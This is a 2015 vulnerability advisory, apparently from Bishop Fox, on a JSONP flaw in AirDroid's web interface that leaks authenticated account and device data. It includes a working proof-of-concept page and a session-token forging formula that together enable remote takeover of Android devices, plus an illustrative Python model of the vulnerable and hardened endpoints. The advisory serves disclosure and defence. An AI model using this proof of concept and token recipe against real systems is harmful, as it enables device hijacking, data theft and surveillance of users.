Release Date
April 15, 2015
Patch Date
March 2015
Reported Date
February 27, 2015 – Submitted to AirDroid
Vendor
AirDroid/Sand Studio/TongBu Networks
Systems Affected
None. Vulnerability patched as of March 2015.
Summary
AirDroid version 3.0.4 and earlier web applications use JSON with padding (JSONP) to perform cross-origin requests. Because a JSONP endpoint returns authenticated data as a script that any third-party page can include, and the browser attaches the user's session cookies to that script request, the data is readable by the including page. This makes it possible to hijack all of the AirDroid application functionality and, through it, other users' Android devices.
Vendor Status
AirDroid has been made aware of the issue and has pushed a patch to the web interface.
Exploit Availability
We created an exploit to demonstrate the severity of this particular vulnerability. It works as follows:
1. Construct a malicious page that sources the following JSONP endpoint:
<!DOCTYPE html>
<body>
<script>
function _callhack( stolen_data ) {
    alert( JSON.stringify( stolen_data ) );
}
</script>
<script src="https://id.airdroid.com/p9/user/signIn.html?callback=_callhack"></script>
</body>
2. Lure an authenticated AirDroid user to the malicious page created in step 1. The victim's browser loads the JSONP endpoint above using the victim's active AirDroid web session, and the response contains the information needed to generate a valid 7bb session token. A sample response is given below:
_callhack({"code":"1","result":{"id":"2960728","nickname":"mandatory","mail":"mandatory@[REDACTED]","create_date":"2013-11-27 03:01:58","data_flow_total":"0","vip":"0","vip_starttime":null,"vip_endtime":null,"from_type":"","read_new":"1","mail_verify":"1","pay_type":"0","isPremium":-1,"has_device":"1","device":[{"id":"2800627","name":"","deviceId":"182bed78cde24b3aa9458b[REDACTED]","channelToken":"ae089b0a0a0d[REDACTED]","logicKey":"7530f7bd7149c7c57a5[REDACTED]","manu":"samsung","model":"SM-N900V","model_pic":"http://img.airdroid.com/devices//samsung/Samsung Note 3","osVersion":"4.3","sdkApiLevel":"18","netOpts":{"ip":"[REDACTED]","port":8888,"socket_port":8889,"ssl_port":8890,"usewifi":"true"},"appVer":"67","is_default":"0","imsi":"311480[REDACTED]","create_date":"2014-08-23 22:37:18"}],"app_last_modify":"1415991234"},"msg":"success!"})
3. Using the above information, a valid 7bb session token can be generated. The following pseudocode shows the process for creating said token:
bb = UNIX_TIMESTAMP + md5(UNIX_TIMESTAMP + DEVICE_ID + LOGIC_KEY)
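The root cause is that authenticated account data is served through a callback wrapper that any page can load with a script tag. The following added example (not AirDroid's code; request and response shapes, the session store, the account record and the allowed origin are constructed stand-ins) models the vulnerable endpoint beside a hardened replacement that returns plain JSON, requires a custom request header, and only reflects allow-listed origins in CORS headers:

```python
"""Model of a JSONP sign-in endpoint and its hardened replacement.

Added example, not AirDroid's code. The request/response shapes, the
session store, the account record and the allowed origin are constructed.
"""
import json
from dataclasses import dataclass, field

# Constructed sample: one logged-in session and the account data the
# endpoint returns for it (placeholder values, not real identifiers).
SESSIONS = {
    "sess-abc123": {
        "id": "2960728",
        "nickname": "demo",
        "device": [{"deviceId": "DEVICE_ID_PLACEHOLDER", "logicKey": "LOGIC_KEY_PLACEHOLDER"}],
    }
}

# Assumption: the only browser origin that should read account data.
ALLOWED_ORIGINS = {"https://web.airdroid.com"}


@dataclass
class Request:
    query: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)  # header names lower-cased
    cookies: dict = field(default_factory=dict)


@dataclass
class Response:
    status: int
    headers: dict
    body: str


def _account_for(req):
    """Resolve the session cookie to an account record, or None."""
    return SESSIONS.get(req.cookies.get("session"))


def jsonp_signin(req):
    """Vulnerable pattern: wraps the caller's data in whatever callback the
    query names. A <script src=...> on any page sends the session cookie and
    executes the result as JavaScript, so the embedding page reads the data.
    The Origin header is never consulted."""
    account = _account_for(req)
    if account is None:
        return Response(401, {}, "")
    payload = json.dumps({"code": "1", "result": account, "msg": "success!"})
    callback = req.query.get("callback")
    if callback:
        return Response(200, {"Content-Type": "application/javascript"}, f"{callback}({payload})")
    return Response(200, {"Content-Type": "application/json"}, payload)


def hardened_signin(req):
    """Hardened replacement: plain JSON that is never wrapped in a callback,
    a custom header that a <script> tag cannot add (so a cross-origin caller
    must pass CORS preflight), and CORS headers only for allow-listed origins."""
    account = _account_for(req)
    if account is None:
        return Response(401, {}, "")
    origin = req.headers.get("origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return Response(403, {}, "")
    if req.headers.get("x-requested-with") != "XMLHttpRequest":
        return Response(403, {}, "")
    headers = {
        "Content-Type": "application/json",
        "X-Content-Type-Options": "nosniff",
        "Vary": "Origin",
    }
    if origin is not None:
        headers["Access-Control-Allow-Origin"] = origin
        headers["Access-Control-Allow-Credentials"] = "true"
    payload = json.dumps({"code": "1", "result": account, "msg": "success!"})
    return Response(200, headers, payload)


if __name__ == "__main__":
    # A script-tag style request: cookie present, callback named, no custom header.
    third_party = Request(query={"callback": "_callhack"}, cookies={"session": "sess-abc123"})
    print("jsonp   :", jsonp_signin(third_party).status, jsonp_signin(third_party).body[:40])
    print("hardened:", hardened_signin(third_party).status)
```

The hardened handler rejects the script-tag request outright, since the script include cannot set X-Requested-With, while the legitimate web client, calling from an allow-listed origin with that header, still receives the JSON it needs.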
Vulnerability Details
This authentication flaw allows remote control of other users' Android phones, including the following functionality:
• SMS: send and receive individual or group messages.
• Apps: Import and export .apk files.
• Files: Manage files on Android and transfer files between Android and computer.
• Photos: View and manage photos on Android and transfer photos between Android and computer.
• Music & Videos: Play and manage music & videos on Android and transfer them between Android and computer.
• Ringtones: Set music as ringtone and export any ringtone.
• Contacts: View and edit all the contacts.
• Screenshot: View the real-time screen of Android devices, take static screenshots. (root required)
• Camera: See through the lens of both front and back camera, also supports flashlight.
• URL: Push a URL to Android and automatically open it with the Android browser.
• Clipboard: Share clipboard content between Android and computer.
• GPS: Track the mobile device’s location.
Researcher
Matt Bryant of Bishop Fox